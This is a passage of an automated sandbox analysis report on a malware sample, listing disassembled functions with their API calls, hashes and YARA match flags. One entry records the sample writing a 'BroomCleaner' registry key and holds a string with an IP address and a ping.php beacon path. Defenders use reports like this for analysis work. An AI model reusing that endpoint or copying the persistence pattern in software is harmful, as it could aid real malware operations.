                                                                                                                                                        • Opcode Fuzzy Hash: bdce98cfa96bad54e0b597383ae5f841ffe0f48aba0a72e5dd8a679a579e2192
                                                                                                                                                        • Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 05D06EA0
                                                                                                                                                          • Part of subcall function 05D06501: HeapFree.KERNEL32(00000000,00000000,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?), ref: 05D06517
                                                                                                                                                          • Part of subcall function 05D06501: GetLastError.KERNEL32(?,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?,?), ref: 05D06529
                                                                                                                                                        • _free.LIBCMT ref: 05D06EAC
                                                                                                                                                        • _free.LIBCMT ref: 05D06EB7
                                                                                                                                                        • _free.LIBCMT ref: 05D06EC2
                                                                                                                                                        • _free.LIBCMT ref: 05D06ECD
                                                                                                                                                        • _free.LIBCMT ref: 05D06ED8
                                                                                                                                                        • _free.LIBCMT ref: 05D06EE3
                                                                                                                                                        • _free.LIBCMT ref: 05D06EEE
                                                                                                                                                        • _free.LIBCMT ref: 05D06EF9
                                                                                                                                                        • _free.LIBCMT ref: 05D06F07
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                        • Instruction ID: 9c57deb867c65d253e6593992eb9406f34c80ada8bab5f8c52bbf359bde78e0b
                                                                                                                                                        • Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                        • Instruction Fuzzy Hash: 0111CB75200508BFDB11EF95C848EDD3B65EF04354B4154A6F9088F2B9DA32EE60DBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 00416C39
                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                        • _free.LIBCMT ref: 00416C45
                                                                                                                                                        • _free.LIBCMT ref: 00416C50
                                                                                                                                                        • _free.LIBCMT ref: 00416C5B
                                                                                                                                                        • _free.LIBCMT ref: 00416C66
                                                                                                                                                        • _free.LIBCMT ref: 00416C71
                                                                                                                                                        • _free.LIBCMT ref: 00416C7C
                                                                                                                                                        • _free.LIBCMT ref: 00416C87
                                                                                                                                                        • _free.LIBCMT ref: 00416C92
                                                                                                                                                        • _free.LIBCMT ref: 00416CA0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                        • Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
                                                                                                                                                        • Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                        • Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 05CF141C
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 05CF142E
                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05CF146B
                                                                                                                                                          • Part of subcall function 05CF80E1: _Yarn.LIBCPMT ref: 05CF8100
                                                                                                                                                          • Part of subcall function 05CF80E1: _Yarn.LIBCPMT ref: 05CF8124
                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 05CF148C
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 05CF149A
                                                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05CF14BD
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 05CF152E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                        • String ID: n~B
                                                                                                                                                        • API String ID: 835844855-2489732092
                                                                                                                                                        • Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
                                                                                                                                                        • Instruction ID: 09af9737e79d3a41249d4e2c453d33ee6782ce30872a49d154a186a367e9b370
                                                                                                                                                        • Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
                                                                                                                                                        • Instruction Fuzzy Hash: 27319F72905B40EFC7319F29E84465AFBF5FF48710B548A2FE19A92A80C734A601CF59
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                          • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                          • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                        • API String ID: 835844855-1405518554
                                                                                                                                                        • Opcode ID: 18baea1ba75347acc1cbce090f57c78de98d7f253c80eba5839dc4d456aea96c
                                                                                                                                                        • Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
                                                                                                                                                        • Opcode Fuzzy Hash: 18baea1ba75347acc1cbce090f57c78de98d7f253c80eba5839dc4d456aea96c
                                                                                                                                                        • Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
                                                                                                                                                        • Instruction ID: a6fed0b992a7b2dfc1d4090394881f379ddd8a729e02ed4252f974a7ad05afa9
                                                                                                                                                        • Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
                                                                                                                                                        • Instruction Fuzzy Hash: 44C1C075E04249ABDF11DFA8C8A8BADBBB1FF49310F085096E541A73D2C770D941CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 05D04F5B
                                                                                                                                                        • _free.LIBCMT ref: 05D04FCC
                                                                                                                                                        • _free.LIBCMT ref: 05D04FE5
                                                                                                                                                        • _free.LIBCMT ref: 05D05017
                                                                                                                                                        • _free.LIBCMT ref: 05D05020
                                                                                                                                                        • _free.LIBCMT ref: 05D0502C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                        • String ID: C
                                                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                                                        • Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
                                                                                                                                                        • Instruction ID: 16450180348fb7425e5822945564c0e9a4022724ed19e72ea006885279821f0f
                                                                                                                                                        • Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
                                                                                                                                                        • Instruction Fuzzy Hash: 2BB12775A012199FDB24DF18C888FADB7B5FF48304F5045AADA49A7394D731AE90CF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                        • _free.LIBCMT ref: 00414D65
                                                                                                                                                        • _free.LIBCMT ref: 00414D7E
                                                                                                                                                        • _free.LIBCMT ref: 00414DB0
                                                                                                                                                        • _free.LIBCMT ref: 00414DB9
                                                                                                                                                        • _free.LIBCMT ref: 00414DC5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                        • String ID: C
                                                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                                                        • Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
                                                                                                                                                        • Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
                                                                                                                                                        • Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
                                                                                                                                                        • Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                        • _free.LIBCMT ref: 004146D7
                                                                                                                                                        • _free.LIBCMT ref: 004146EE
                                                                                                                                                        • _free.LIBCMT ref: 0041470D
                                                                                                                                                        • _free.LIBCMT ref: 00414728
                                                                                                                                                        • _free.LIBCMT ref: 0041473F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                        • String ID: B$|B
                                                                                                                                                        • API String ID: 3033488037-200315465
                                                                                                                                                        • Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
                                                                                                                                                        • Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
                                                                                                                                                        • Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
                                                                                                                                                        • Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                        • __freea.LIBCMT ref: 00416926
                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                        • __freea.LIBCMT ref: 0041692F
                                                                                                                                                        • __freea.LIBCMT ref: 00416954
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3864826663-0
                                                                                                                                                        • Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
                                                                                                                                                        • Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
                                                                                                                                                        • Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
                                                                                                                                                        • Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                        • Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
                                                                                                                                                        • Instruction ID: d66ee261eb0c5bc6011ac711a96a9ba5dbe4f34bb1de012ab7fd93120022195d
                                                                                                                                                        • Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
                                                                                                                                                        • Instruction Fuzzy Hash: 24619275E04206AFEB30DFA4C844BAEBBF5FB44710F24516BD944EB2C5DA70A941CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                        • Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
                                                                                                                                                        • Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
                                                                                                                                                        • Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
                                                                                                                                                        • Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                        • String ID: B
                                                                                                                                                        • API String ID: 3033488037-2386870291
                                                                                                                                                        • Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
                                                                                                                                                        • Instruction ID: 96582530853469d813a57036bf222f960603bdacdc7612911d6c744486874e80
                                                                                                                                                        • Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
                                                                                                                                                        • Instruction Fuzzy Hash: CF51AE32A00604ABDF20DF69DC40F6A77F5FF48720B14556EEA4ADB290E731EA11CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05D063EF,?,?,?,?,?,?), ref: 05D05CBC
                                                                                                                                                        • __fassign.LIBCMT ref: 05D05D37
                                                                                                                                                        • __fassign.LIBCMT ref: 05D05D52
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05D05D78
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,05D063EF,00000000,?,?,?,?,?,?,?,?,?,05D063EF,?), ref: 05D05D97
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,05D063EF,00000000,?,?,?,?,?,?,?,?,?,05D063EF,?), ref: 05D05DD0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                        • Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
                                                                                                                                                        • Instruction ID: 1bfe2ec98d1f00eb3e3f0917ab3ae26a886bf213686fc30f473db2fe4bffe519
                                                                                                                                                        • Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
                                                                                                                                                        • Instruction Fuzzy Hash: 5C518171A00249AFDB20CFA8D885BEEBBF4EF09310F14516BE995E7291D7309951CFA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                        • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                        • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                        • Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
                                                                                                                                                        • Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
                                                                                                                                                        • Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
                                                                                                                                                        • Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040A6FB
                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040A791
                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040A811
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                        • String ID: csm
                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                        • Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                        • Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
                                                                                                                                                        • Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                        • Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 05D163C6
                                                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 05D163EE
                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 05D16471
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05D16492
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCreateH_prologValue
                                                                                                                                                        • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                        • API String ID: 1996196666-529226407
                                                                                                                                                        • Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                        • Instruction ID: 57fb3dece2b12e3abda4a6d6ff25838d5315e26c45d4c8599467380d82081f1d
                                                                                                                                                        • Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                        • Instruction Fuzzy Hash: C9318771A00219EEDB149FA8DC94AFEBB79FB48314F54052EE902B7251C7715D06CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 791c7b4aae0b1c2b416b1f562a5509af260bb6d414dca8c56a91ecd19c1a7e4a
                                                                                                                                                        • Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
                                                                                                                                                        • Opcode Fuzzy Hash: 791c7b4aae0b1c2b416b1f562a5509af260bb6d414dca8c56a91ecd19c1a7e4a
                                                                                                                                                        • Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D0F25A: _free.LIBCMT ref: 05D0F283
                                                                                                                                                        • _free.LIBCMT ref: 05D0F561
